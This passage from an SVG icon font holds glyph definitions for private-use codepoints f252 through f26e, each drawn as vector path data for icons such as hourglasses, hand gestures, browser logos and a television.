<glyph unicode="&#xf252;" d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9 t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM1280 1408h-1024q0 -206 85 -384h854q85 178 85 384zM1223 192q-54 141 -145.5 241.5t-194.5 142.5h-230q-103 -42 -194.5 -142.5t-145.5 -241.5h910z" />
<glyph unicode="&#xf253;" d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9 t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM874 700q77 29 149 92.5t129.5 152.5t92.5 210t35 253h-1024q0 -132 35 -253t92.5 -210t129.5 -152.5t149 -92.5q19 -7 30.5 -23.5t11.5 -36.5t-11.5 -36.5t-30.5 -23.5q-137 -51 -244 -196 h700q-107 145 -244 196q-19 7 -30.5 23.5t-11.5 36.5t11.5 36.5t30.5 23.5z" />
<glyph unicode="&#xf254;" d="M1504 -64q14 0 23 -9t9 -23v-128q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v128q0 14 9 23t23 9h1472zM130 0q3 55 16 107t30 95t46 87t53.5 76t64.5 69.5t66 60t70.5 55t66.5 47.5t65 43q-43 28 -65 43t-66.5 47.5t-70.5 55t-66 60t-64.5 69.5t-53.5 76t-46 87 t-30 95t-16 107h1276q-3 -55 -16 -107t-30 -95t-46 -87t-53.5 -76t-64.5 -69.5t-66 -60t-70.5 -55t-66.5 -47.5t-65 -43q43 -28 65 -43t66.5 -47.5t70.5 -55t66 -60t64.5 -69.5t53.5 -76t46 -87t30 -95t16 -107h-1276zM1504 1536q14 0 23 -9t9 -23v-128q0 -14 -9 -23t-23 -9 h-1472q-14 0 -23 9t-9 23v128q0 14 9 23t23 9h1472z" />
<glyph unicode="&#xf255;" d="M768 1152q-53 0 -90.5 -37.5t-37.5 -90.5v-128h-32v93q0 48 -32 81.5t-80 33.5q-46 0 -79 -33t-33 -79v-429l-32 30v172q0 48 -32 81.5t-80 33.5q-46 0 -79 -33t-33 -79v-224q0 -47 35 -82l310 -296q39 -39 39 -102q0 -26 19 -45t45 -19h640q26 0 45 19t19 45v25 q0 41 10 77l108 436q10 36 10 77v246q0 48 -32 81.5t-80 33.5q-46 0 -79 -33t-33 -79v-32h-32v125q0 40 -25 72.5t-64 40.5q-14 2 -23 2q-46 0 -79 -33t-33 -79v-128h-32v122q0 51 -32.5 89.5t-82.5 43.5q-5 1 -13 1zM768 1280q84 0 149 -50q57 34 123 34q59 0 111 -27 t86 -76q27 7 59 7q100 0 170 -71.5t70 -171.5v-246q0 -51 -13 -108l-109 -436q-6 -24 -6 -71q0 -80 -56 -136t-136 -56h-640q-84 0 -138 58.5t-54 142.5l-308 296q-76 73 -76 175v224q0 99 70.5 169.5t169.5 70.5q11 0 16 -1q6 95 75.5 160t164.5 65q52 0 98 -21 q72 69 174 69z" />
<glyph unicode="&#xf256;" horiz-adv-x="1792" d="M880 1408q-46 0 -79 -33t-33 -79v-656h-32v528q0 46 -33 79t-79 33t-79 -33t-33 -79v-528v-256l-154 205q-38 51 -102 51q-53 0 -90.5 -37.5t-37.5 -90.5q0 -43 26 -77l384 -512q38 -51 102 -51h688q34 0 61 22t34 56l76 405q5 32 5 59v498q0 46 -33 79t-79 33t-79 -33 t-33 -79v-272h-32v528q0 46 -33 79t-79 33t-79 -33t-33 -79v-528h-32v656q0 46 -33 79t-79 33zM880 1536q68 0 125.5 -35.5t88.5 -96.5q19 4 42 4q99 0 169.5 -70.5t70.5 -169.5v-17q105 6 180.5 -64t75.5 -175v-498q0 -40 -8 -83l-76 -404q-14 -79 -76.5 -131t-143.5 -52 h-688q-60 0 -114.5 27.5t-90.5 74.5l-384 512q-51 68 -51 154q0 106 75 181t181 75q78 0 128 -34v434q0 99 70.5 169.5t169.5 70.5q23 0 42 -4q31 61 88.5 96.5t125.5 35.5z" />
<glyph unicode="&#xf257;" horiz-adv-x="1792" d="M1073 -128h-177q-163 0 -226 141q-23 49 -23 102v5q-62 30 -98.5 88.5t-36.5 127.5q0 38 5 48h-261q-106 0 -181 75t-75 181t75 181t181 75h113l-44 17q-74 28 -119.5 93.5t-45.5 145.5q0 106 75 181t181 75q46 0 91 -17l628 -239h401q106 0 181 -75t75 -181v-668 q0 -88 -54 -157.5t-140 -90.5l-339 -85q-92 -23 -186 -23zM1024 583l-155 -71l-163 -74q-30 -14 -48 -41.5t-18 -60.5q0 -46 33 -79t79 -33q26 0 46 10l338 154q-49 10 -80.5 50t-31.5 90v55zM1344 272q0 46 -33 79t-79 33q-26 0 -46 -10l-290 -132q-28 -13 -37 -17 t-30.5 -17t-29.5 -23.5t-16 -29t-8 -40.5q0 -50 31.5 -82t81.5 -32q20 0 38 9l352 160q30 14 48 41.5t18 60.5zM1112 1024l-650 248q-24 8 -46 8q-53 0 -90.5 -37.5t-37.5 -90.5q0 -40 22.5 -73t59.5 -47l526 -200v-64h-640q-53 0 -90.5 -37.5t-37.5 -90.5t37.5 -90.5 t90.5 -37.5h535l233 106v198q0 63 46 106l111 102h-69zM1073 0q82 0 155 19l339 85q43 11 70 45.5t27 78.5v668q0 53 -37.5 90.5t-90.5 37.5h-308l-136 -126q-36 -33 -36 -82v-296q0 -46 33 -77t79 -31t79 35t33 81v208h32v-208q0 -70 -57 -114q52 -8 86.5 -48.5t34.5 -93.5 q0 -42 -23 -78t-61 -53l-310 -141h91z" />
<glyph unicode="&#xf258;" horiz-adv-x="2048" d="M1151 1536q61 0 116 -28t91 -77l572 -781q118 -159 118 -359v-355q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v177l-286 143h-546q-80 0 -136 56t-56 136v32q0 119 84.5 203.5t203.5 84.5h420l42 128h-686q-100 0 -173.5 67.5t-81.5 166.5q-65 79 -65 182v32 q0 80 56 136t136 56h959zM1920 -64v355q0 157 -93 284l-573 781q-39 52 -103 52h-959q-26 0 -45 -19t-19 -45q0 -32 1.5 -49.5t9.5 -40.5t25 -43q10 31 35.5 50t56.5 19h832v-32h-832q-26 0 -45 -19t-19 -45q0 -44 3 -58q8 -44 44 -73t81 -29h640h91q40 0 68 -28t28 -68 q0 -15 -5 -30l-64 -192q-10 -29 -35 -47.5t-56 -18.5h-443q-66 0 -113 -47t-47 -113v-32q0 -26 19 -45t45 -19h561q16 0 29 -7l317 -158q24 -13 38.5 -36t14.5 -50v-197q0 -26 19 -45t45 -19h384q26 0 45 19t19 45z" />
<glyph unicode="&#xf259;" horiz-adv-x="2048" d="M816 1408q-48 0 -79.5 -34t-31.5 -82q0 -14 3 -28l150 -624h-26l-116 482q-9 38 -39.5 62t-69.5 24q-47 0 -79 -34t-32 -81q0 -11 4 -29q3 -13 39 -161t68 -282t32 -138v-227l-307 230q-34 26 -77 26q-52 0 -89.5 -36.5t-37.5 -88.5q0 -67 56 -110l507 -379 q34 -26 76 -26h694q33 0 59 20.5t34 52.5l100 401q8 30 10 88t9 86l116 478q3 12 3 26q0 46 -33 79t-80 33q-38 0 -69 -25.5t-40 -62.5l-99 -408h-26l132 547q3 14 3 28q0 47 -32 80t-80 33q-38 0 -68.5 -24t-39.5 -62l-145 -602h-127l-164 682q-9 38 -39.5 62t-68.5 24z M1461 -256h-694q-85 0 -153 51l-507 380q-50 38 -78.5 94t-28.5 118q0 105 75 179t180 74q25 0 49.5 -5.5t41.5 -11t41 -20.5t35 -23t38.5 -29.5t37.5 -28.5l-123 512q-7 35 -7 59q0 93 60 162t152 79q14 87 80.5 144.5t155.5 57.5q83 0 148 -51.5t85 -132.5l103 -428 l83 348q20 81 85 132.5t148 51.5q87 0 152.5 -54t82.5 -139q93 -10 155 -78t62 -161q0 -30 -7 -57l-116 -477q-5 -22 -5 -67q0 -51 -13 -108l-101 -401q-19 -75 -79.5 -122.5t-137.5 -47.5z" />
<glyph unicode="&#xf25a;" horiz-adv-x="1792" d="M640 1408q-53 0 -90.5 -37.5t-37.5 -90.5v-512v-384l-151 202q-41 54 -107 54q-52 0 -89 -38t-37 -90q0 -43 26 -77l384 -512q38 -51 102 -51h718q22 0 39.5 13.5t22.5 34.5l92 368q24 96 24 194v217q0 41 -28 71t-68 30t-68 -28t-28 -68h-32v61q0 48 -32 81.5t-80 33.5 q-46 0 -79 -33t-33 -79v-64h-32v90q0 55 -37 94.5t-91 39.5q-53 0 -90.5 -37.5t-37.5 -90.5v-96h-32v570q0 55 -37 94.5t-91 39.5zM640 1536q107 0 181.5 -77.5t74.5 -184.5v-220q22 2 32 2q99 0 173 -69q47 21 99 21q113 0 184 -87q27 7 56 7q94 0 159 -67.5t65 -161.5 v-217q0 -116 -28 -225l-92 -368q-16 -64 -68 -104.5t-118 -40.5h-718q-60 0 -114.5 27.5t-90.5 74.5l-384 512q-51 68 -51 154q0 105 74.5 180.5t179.5 75.5q71 0 130 -35v547q0 106 75 181t181 75zM768 128v384h-32v-384h32zM1024 128v384h-32v-384h32zM1280 128v384h-32 v-384h32z" />
<glyph unicode="&#xf25b;" d="M1288 889q60 0 107 -23q141 -63 141 -226v-177q0 -94 -23 -186l-85 -339q-21 -86 -90.5 -140t-157.5 -54h-668q-106 0 -181 75t-75 181v401l-239 628q-17 45 -17 91q0 106 75 181t181 75q80 0 145.5 -45.5t93.5 -119.5l17 -44v113q0 106 75 181t181 75t181 -75t75 -181 v-261q27 5 48 5q69 0 127.5 -36.5t88.5 -98.5zM1072 896q-33 0 -60.5 -18t-41.5 -48l-74 -163l-71 -155h55q50 0 90 -31.5t50 -80.5l154 338q10 20 10 46q0 46 -33 79t-79 33zM1293 761q-22 0 -40.5 -8t-29 -16t-23.5 -29.5t-17 -30.5t-17 -37l-132 -290q-10 -20 -10 -46 q0 -46 33 -79t79 -33q33 0 60.5 18t41.5 48l160 352q9 18 9 38q0 50 -32 81.5t-82 31.5zM128 1120q0 -22 8 -46l248 -650v-69l102 111q43 46 106 46h198l106 233v535q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5v-640h-64l-200 526q-14 37 -47 59.5t-73 22.5 q-53 0 -90.5 -37.5t-37.5 -90.5zM1180 -128q44 0 78.5 27t45.5 70l85 339q19 73 19 155v91l-141 -310q-17 -38 -53 -61t-78 -23q-53 0 -93.5 34.5t-48.5 86.5q-44 -57 -114 -57h-208v32h208q46 0 81 33t35 79t-31 79t-77 33h-296q-49 0 -82 -36l-126 -136v-308 q0 -53 37.5 -90.5t90.5 -37.5h668z" />
<glyph unicode="&#xf25c;" horiz-adv-x="1973" d="M857 992v-117q0 -13 -9.5 -22t-22.5 -9h-298v-812q0 -13 -9 -22.5t-22 -9.5h-135q-13 0 -22.5 9t-9.5 23v812h-297q-13 0 -22.5 9t-9.5 22v117q0 14 9 23t23 9h793q13 0 22.5 -9.5t9.5 -22.5zM1895 995l77 -961q1 -13 -8 -24q-10 -10 -23 -10h-134q-12 0 -21 8.5 t-10 20.5l-46 588l-189 -425q-8 -19 -29 -19h-120q-20 0 -29 19l-188 427l-45 -590q-1 -12 -10 -20.5t-21 -8.5h-135q-13 0 -23 10q-9 10 -9 24l78 961q1 12 10 20.5t21 8.5h142q20 0 29 -19l220 -520q10 -24 20 -51q3 7 9.5 24.5t10.5 26.5l221 520q9 19 29 19h141 q13 0 22 -8.5t10 -20.5z" />
<glyph unicode="&#xf25d;" horiz-adv-x="1792" d="M1042 833q0 88 -60 121q-33 18 -117 18h-123v-281h162q66 0 102 37t36 105zM1094 548l205 -373q8 -17 -1 -31q-8 -16 -27 -16h-152q-20 0 -28 17l-194 365h-155v-350q0 -14 -9 -23t-23 -9h-134q-14 0 -23 9t-9 23v960q0 14 9 23t23 9h294q128 0 190 -24q85 -31 134 -109 t49 -180q0 -92 -42.5 -165.5t-115.5 -109.5q6 -10 9 -16zM896 1376q-150 0 -286 -58.5t-234.5 -157t-157 -234.5t-58.5 -286t58.5 -286t157 -234.5t234.5 -157t286 -58.5t286 58.5t234.5 157t157 234.5t58.5 286t-58.5 286t-157 234.5t-234.5 157t-286 58.5zM1792 640 q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
<glyph unicode="&#xf25e;" horiz-adv-x="1792" d="M605 303q153 0 257 104q14 18 3 36l-45 82q-6 13 -24 17q-16 2 -27 -11l-4 -3q-4 -4 -11.5 -10t-17.5 -13t-23.5 -14.5t-28.5 -13.5t-33.5 -9.5t-37.5 -3.5q-76 0 -125 50t-49 127q0 76 48 125.5t122 49.5q37 0 71.5 -14t50.5 -28l16 -14q11 -11 26 -10q16 2 24 14l53 78 q13 20 -2 39q-3 4 -11 12t-30 23.5t-48.5 28t-67.5 22.5t-86 10q-148 0 -246 -96.5t-98 -240.5q0 -146 97 -241.5t247 -95.5zM1235 303q153 0 257 104q14 18 4 36l-45 82q-8 14 -25 17q-16 2 -27 -11l-4 -3q-4 -4 -11.5 -10t-17.5 -13t-23.5 -14.5t-28.5 -13.5t-33.5 -9.5 t-37.5 -3.5q-76 0 -125 50t-49 127q0 76 48 125.5t122 49.5q37 0 71.5 -14t50.5 -28l16 -14q11 -11 26 -10q16 2 24 14l53 78q13 20 -2 39q-3 4 -11 12t-30 23.5t-48.5 28t-67.5 22.5t-86 10q-147 0 -245.5 -96.5t-98.5 -240.5q0 -146 97 -241.5t247 -95.5zM896 1376 q-150 0 -286 -58.5t-234.5 -157t-157 -234.5t-58.5 -286t58.5 -286t157 -234.5t234.5 -157t286 -58.5t286 58.5t234.5 157t157 234.5t58.5 286t-58.5 286t-157 234.5t-234.5 157t-286 58.5zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286t-286 -191 t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71z" />
<glyph unicode="&#xf260;" horiz-adv-x="2048" d="M736 736l384 -384l-384 -384l-672 672l672 672l168 -168l-96 -96l-72 72l-480 -480l480 -480l193 193l-289 287zM1312 1312l672 -672l-672 -672l-168 168l96 96l72 -72l480 480l-480 480l-193 -193l289 -287l-96 -96l-384 384z" />
<glyph unicode="&#xf261;" horiz-adv-x="1792" d="M717 182l271 271l-279 279l-88 -88l192 -191l-96 -96l-279 279l279 279l40 -40l87 87l-127 128l-454 -454zM1075 190l454 454l-454 454l-271 -271l279 -279l88 88l-192 191l96 96l279 -279l-279 -279l-40 40l-87 -88zM1792 640q0 -182 -71 -348t-191 -286t-286 -191 t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
<glyph unicode="&#xf262;" horiz-adv-x="2304" d="M651 539q0 -39 -27.5 -66.5t-65.5 -27.5q-39 0 -66.5 27.5t-27.5 66.5q0 38 27.5 65.5t66.5 27.5q38 0 65.5 -27.5t27.5 -65.5zM1805 540q0 -39 -27.5 -66.5t-66.5 -27.5t-66.5 27.5t-27.5 66.5t27.5 66t66.5 27t66.5 -27t27.5 -66zM765 539q0 79 -56.5 136t-136.5 57 t-136.5 -56.5t-56.5 -136.5t56.5 -136.5t136.5 -56.5t136.5 56.5t56.5 136.5zM1918 540q0 80 -56.5 136.5t-136.5 56.5q-79 0 -136 -56.5t-57 -136.5t56.5 -136.5t136.5 -56.5t136.5 56.5t56.5 136.5zM850 539q0 -116 -81.5 -197.5t-196.5 -81.5q-116 0 -197.5 82t-81.5 197 t82 196.5t197 81.5t196.5 -81.5t81.5 -196.5zM2004 540q0 -115 -81.5 -196.5t-197.5 -81.5q-115 0 -196.5 81.5t-81.5 196.5t81.5 196.5t196.5 81.5q116 0 197.5 -81.5t81.5 -196.5zM1040 537q0 191 -135.5 326.5t-326.5 135.5q-125 0 -231 -62t-168 -168.5t-62 -231.5 t62 -231.5t168 -168.5t231 -62q191 0 326.5 135.5t135.5 326.5zM1708 1110q-254 111 -556 111q-319 0 -573 -110q117 0 223 -45.5t182.5 -122.5t122 -183t45.5 -223q0 115 43.5 219.5t118 180.5t177.5 123t217 50zM2187 537q0 191 -135 326.5t-326 135.5t-326.5 -135.5 t-135.5 -326.5t135.5 -326.5t326.5 -135.5t326 135.5t135 326.5zM1921 1103h383q-44 -51 -75 -114.5t-40 -114.5q110 -151 110 -337q0 -156 -77 -288t-209 -208.5t-287 -76.5q-133 0 -249 56t-196 155q-47 -56 -129 -179q-11 22 -53.5 82.5t-74.5 97.5 q-80 -99 -196.5 -155.5t-249.5 -56.5q-155 0 -287 76.5t-209 208.5t-77 288q0 186 110 337q-9 51 -40 114.5t-75 114.5h365q149 100 355 156.5t432 56.5q224 0 421 -56t348 -157z" />
<glyph unicode="&#xf263;" horiz-adv-x="1280" d="M640 629q-188 0 -321 133t-133 320q0 188 133 321t321 133t321 -133t133 -321q0 -187 -133 -320t-321 -133zM640 1306q-92 0 -157.5 -65.5t-65.5 -158.5q0 -92 65.5 -157.5t157.5 -65.5t157.5 65.5t65.5 157.5q0 93 -65.5 158.5t-157.5 65.5zM1163 574q13 -27 15 -49.5 t-4.5 -40.5t-26.5 -38.5t-42.5 -37t-61.5 -41.5q-115 -73 -315 -94l73 -72l267 -267q30 -31 30 -74t-30 -73l-12 -13q-31 -30 -74 -30t-74 30q-67 68 -267 268l-267 -268q-31 -30 -74 -30t-73 30l-12 13q-31 30 -31 73t31 74l267 267l72 72q-203 21 -317 94 q-39 25 -61.5 41.5t-42.5 37t-26.5 38.5t-4.5 40.5t15 49.5q10 20 28 35t42 22t56 -2t65 -35q5 -4 15 -11t43 -24.5t69 -30.5t92 -24t113 -11q91 0 174 25.5t120 50.5l38 25q33 26 65 35t56 2t42 -22t28 -35z" />
<glyph unicode="&#xf264;" d="M927 956q0 -66 -46.5 -112.5t-112.5 -46.5t-112.5 46.5t-46.5 112.5t46.5 112.5t112.5 46.5t112.5 -46.5t46.5 -112.5zM1141 593q-10 20 -28 32t-47.5 9.5t-60.5 -27.5q-10 -8 -29 -20t-81 -32t-127 -20t-124 18t-86 36l-27 18q-31 25 -60.5 27.5t-47.5 -9.5t-28 -32 q-22 -45 -2 -74.5t87 -73.5q83 -53 226 -67l-51 -52q-142 -142 -191 -190q-22 -22 -22 -52.5t22 -52.5l9 -9q22 -22 52.5 -22t52.5 22l191 191q114 -115 191 -191q22 -22 52.5 -22t52.5 22l9 9q22 22 22 52.5t-22 52.5l-191 190l-52 52q141 14 225 67q67 44 87 73.5t-2 74.5 zM1092 956q0 134 -95 229t-229 95t-229 -95t-95 -229t95 -229t229 -95t229 95t95 229zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf265;" horiz-adv-x="1720" d="M1565 1408q65 0 110 -45.5t45 -110.5v-519q0 -176 -68 -336t-182.5 -275t-274 -182.5t-334.5 -67.5q-176 0 -335.5 67.5t-274.5 182.5t-183 275t-68 336v519q0 64 46 110t110 46h1409zM861 344q47 0 82 33l404 388q37 35 37 85q0 49 -34.5 83.5t-83.5 34.5q-47 0 -82 -33 l-323 -310l-323 310q-35 33 -81 33q-49 0 -83.5 -34.5t-34.5 -83.5q0 -51 36 -85l405 -388q33 -33 81 -33z" />
<glyph unicode="&#xf266;" horiz-adv-x="2304" d="M1494 -103l-295 695q-25 -49 -158.5 -305.5t-198.5 -389.5q-1 -1 -27.5 -0.5t-26.5 1.5q-82 193 -255.5 587t-259.5 596q-21 50 -66.5 107.5t-103.5 100.5t-102 43q0 5 -0.5 24t-0.5 27h583v-50q-39 -2 -79.5 -16t-66.5 -43t-10 -64q26 -59 216.5 -499t235.5 -540 q31 61 140 266.5t131 247.5q-19 39 -126 281t-136 295q-38 69 -201 71v50l513 -1v-47q-60 -2 -93.5 -25t-12.5 -69q33 -70 87 -189.5t86 -187.5q110 214 173 363q24 55 -10 79.5t-129 26.5q1 7 1 25v24q64 0 170.5 0.5t180 1t92.5 0.5v-49q-62 -2 -119 -33t-90 -81 l-213 -442q13 -33 127.5 -290t121.5 -274l441 1017q-14 38 -49.5 62.5t-65 31.5t-55.5 8v50l460 -4l1 -2l-1 -44q-139 -4 -201 -145q-526 -1216 -559 -1291h-49z" />
<glyph unicode="&#xf267;" horiz-adv-x="1792" d="M949 643q0 -26 -16.5 -45t-41.5 -19q-26 0 -45 16.5t-19 41.5q0 26 17 45t42 19t44 -16.5t19 -41.5zM964 585l350 581q-9 -8 -67.5 -62.5t-125.5 -116.5t-136.5 -127t-117 -110.5t-50.5 -51.5l-349 -580q7 7 67 62t126 116.5t136 127t117 111t50 50.5zM1611 640 q0 -201 -104 -371q-3 2 -17 11t-26.5 16.5t-16.5 7.5q-13 0 -13 -13q0 -10 59 -44q-74 -112 -184.5 -190.5t-241.5 -110.5l-16 67q-1 10 -15 10q-5 0 -8 -5.5t-2 -9.5l16 -68q-72 -15 -146 -15q-199 0 -372 105q1 2 13 20.5t21.5 33.5t9.5 19q0 13 -13 13q-6 0 -17 -14.5 t-22.5 -34.5t-13.5 -23q-113 75 -192 187.5t-110 244.5l69 15q10 3 10 15q0 5 -5.5 8t-10.5 2l-68 -15q-14 72 -14 139q0 206 109 379q2 -1 18.5 -12t30 -19t17.5 -8q13 0 13 12q0 6 -12.5 15.5t-32.5 21.5l-20 12q77 112 189 189t244 107l15 -67q2 -10 15 -10q5 0 8 5.5 t2 10.5l-15 66q71 13 134 13q204 0 379 -109q-39 -56 -39 -65q0 -13 12 -13q11 0 48 64q111 -75 187.5 -186t107.5 -241l-56 -12q-10 -2 -10 -16q0 -5 5.5 -8t9.5 -2l57 13q14 -72 14 -140zM1696 640q0 163 -63.5 311t-170.5 255t-255 170.5t-311 63.5t-311 -63.5 t-255 -170.5t-170.5 -255t-63.5 -311t63.5 -311t170.5 -255t255 -170.5t311 -63.5t311 63.5t255 170.5t170.5 255t63.5 311zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191 t191 -286t71 -348z" />
<glyph unicode="&#xf268;" horiz-adv-x="1792" d="M893 1536q240 2 451 -120q232 -134 352 -372l-742 39q-160 9 -294 -74.5t-185 -229.5l-276 424q128 159 311 245.5t383 87.5zM146 1131l337 -663q72 -143 211 -217t293 -45l-230 -451q-212 33 -385 157.5t-272.5 316t-99.5 411.5q0 267 146 491zM1732 962 q58 -150 59.5 -310.5t-48.5 -306t-153 -272t-246 -209.5q-230 -133 -498 -119l405 623q88 131 82.5 290.5t-106.5 277.5zM896 942q125 0 213.5 -88.5t88.5 -213.5t-88.5 -213.5t-213.5 -88.5t-213.5 88.5t-88.5 213.5t88.5 213.5t213.5 88.5z" />
<glyph unicode="&#xf269;" horiz-adv-x="1792" d="M903 -256q-283 0 -504.5 150.5t-329.5 398.5q-58 131 -67 301t26 332.5t111 312t179 242.5l-11 -281q11 14 68 15.5t70 -15.5q42 81 160.5 138t234.5 59q-54 -45 -119.5 -148.5t-58.5 -163.5q25 -8 62.5 -13.5t63 -7.5t68 -4t50.5 -3q15 -5 9.5 -45.5t-30.5 -75.5 q-5 -7 -16.5 -18.5t-56.5 -35.5t-101 -34l15 -189l-139 67q-18 -43 -7.5 -81.5t36 -66.5t65.5 -41.5t81 -6.5q51 9 98 34.5t83.5 45t73.5 17.5q61 -4 89.5 -33t19.5 -65q-1 -2 -2.5 -5.5t-8.5 -12.5t-18 -15.5t-31.5 -10.5t-46.5 -1q-60 -95 -144.5 -135.5t-209.5 -29.5 q74 -61 162.5 -82.5t168.5 -6t154.5 52t128 87.5t80.5 104q43 91 39 192.5t-37.5 188.5t-78.5 125q87 -38 137 -79.5t77 -112.5q15 170 -57.5 343t-209.5 284q265 -77 412 -279.5t151 -517.5q2 -127 -40.5 -255t-123.5 -238t-189 -196t-247.5 -135.5t-288.5 -49.5z" />
<glyph unicode="&#xf26a;" horiz-adv-x="1792" d="M1493 1308q-165 110 -359 110q-155 0 -293 -73t-240 -200q-75 -93 -119.5 -218t-48.5 -266v-42q4 -141 48.5 -266t119.5 -218q102 -127 240 -200t293 -73q194 0 359 110q-121 -108 -274.5 -168t-322.5 -60q-29 0 -43 1q-175 8 -333 82t-272 193t-181 281t-67 339 q0 182 71 348t191 286t286 191t348 71h3q168 -1 320.5 -60.5t273.5 -167.5zM1792 640q0 -192 -77 -362.5t-213 -296.5q-104 -63 -222 -63q-137 0 -255 84q154 56 253.5 233t99.5 405q0 227 -99 404t-253 234q119 83 254 83q119 0 226 -65q135 -125 210.5 -295t75.5 -361z " />
<glyph unicode="&#xf26b;" horiz-adv-x="1792" d="M1792 599q0 -56 -7 -104h-1151q0 -146 109.5 -244.5t257.5 -98.5q99 0 185.5 46.5t136.5 130.5h423q-56 -159 -170.5 -281t-267.5 -188.5t-321 -66.5q-187 0 -356 83q-228 -116 -394 -116q-237 0 -237 263q0 115 45 275q17 60 109 229q199 360 475 606 q-184 -79 -427 -354q63 274 283.5 449.5t501.5 175.5q30 0 45 -1q255 117 433 117q64 0 116 -13t94.5 -40.5t66.5 -76.5t24 -115q0 -116 -75 -286q101 -182 101 -390zM1722 1239q0 83 -53 132t-137 49q-108 0 -254 -70q121 -47 222.5 -131.5t170.5 -195.5q51 135 51 216z M128 2q0 -86 48.5 -132.5t134.5 -46.5q115 0 266 83q-122 72 -213.5 183t-137.5 245q-98 -205 -98 -332zM632 715h728q-5 142 -113 237t-251 95q-144 0 -251.5 -95t-112.5 -237z" />
<glyph unicode="&#xf26c;" horiz-adv-x="2048" d="M1792 288v960q0 13 -9.5 22.5t-22.5 9.5h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5zM1920 1248v-960q0 -66 -47 -113t-113 -47h-736v-128h352q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23 v64q0 14 9 23t23 9h352v128h-736q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf26d;" horiz-adv-x="1792" d="M138 1408h197q-70 -64 -126 -149q-36 -56 -59 -115t-30 -125.5t-8.5 -120t10.5 -132t21 -126t28 -136.5q4 -19 6 -28q51 -238 81 -329q57 -171 152 -275h-272q-48 0 -82 34t-34 82v1304q0 48 34 82t82 34zM1346 1408h308q48 0 82 -34t34 -82v-1304q0 -48 -34 -82t-82 -34 h-178q212 210 196 565l-469 -101q-2 -45 -12 -82t-31 -72t-59.5 -59.5t-93.5 -36.5q-123 -26 -199 40q-32 27 -53 61t-51.5 129t-64.5 258q-35 163 -45.5 263t-5.5 139t23 77q20 41 62.5 73t102.5 45q45 12 83.5 6.5t67 -17t54 -35t43 -48t34.5 -56.5l468 100 q-68 175 -180 287z" />
<glyph unicode="&#xf26e;" d="M1401 -11l-6 -6q-113 -114 -259 -175q-154 -64 -317 -64q-165 0 -317 64q-148 63 -259 175q-113 112 -175 258q-42 103 -54 189q-4 28 48 36q51 8 56 -20q1 -1 1 -4q18 -90 46 -159q50 -124 152 -226q98 -98 226 -152q132 -56 276 -56q143 0 276 56q128 55 225 152l6 6 q10 10 25 6q12 -3 33 -22q36 -37 17 -58zM929 604l-66 -66l63 -63q21 -21 -7 -49q-17 -17 -32 -17q-10 0 -19 10l-62 61l-66 -66q-5 -5 -15 -5q-15 0 -31 16l-2 2q-18 15 -18 29q0 7 8 17l66 65l-66 66q-16 16 14 45q18 18 31 18q6 0 13 -5l65 -66l65 65q18 17 48 -13 q27 -27 11 -44zM1400 547q0 -118 -46 -228q-45 -105 -126 -186q-80 -80 -187 -126t-228 -46t-228 46t-187 126q-82 82 -125 186q-15 32 -15 40h-1q-9 27 43 44q50 16 60 -12q37 -99 97 -167h1v339v2q3 136 102 232q105 103 253 103q147 0 251 -103t104 -249 q0 -147 -104.5 -251t-250.5 -104q-58 0 -112 16q-28 11 -13 61q16 51 44 43l14 -3q14 -3 32.5 -6t30.5 -3q104 0 176 71.5t72 174.5q0 101 -72 171q-71 71 -175 71q-107 0 -178 -80q-64 -72 -64 -160v-413q110 -67 242 -67q96 0 185 36.5t156 103.5t103.5 155t36.5 183 q0 198 -141 339q-140 140 -339 140q-200 0 -340 -140q-53 -53 -77 -87l-2 -2q-8 -11 -13 -15.5t-21.5 -9.5t-38.5 3q-21 5 -36.5 16.5t-15.5 26.5v680q0 15 10.5 26.5t27.5 11.5h877q30 0 30 -55t-30 -55h-811v-483h1q40 42 102 84t108 61q109 46 231 46q121 0 228 -46 t187 -126q81 -81 126 -186q46 -112 46 -229zM1369 1128q9 -8 9 -18t-5.5 -18t-16.5 -21q-26 -26 -39 -26q-9 0 -16 7q-106 91 -207 133q-128 56 -276 56q-133 0 -262 -49q-27 -10 -45 37q-9 25 -8 38q3 16 16 20q130 57 299 57q164 0 316 -64q137 -58 235 -152z" />
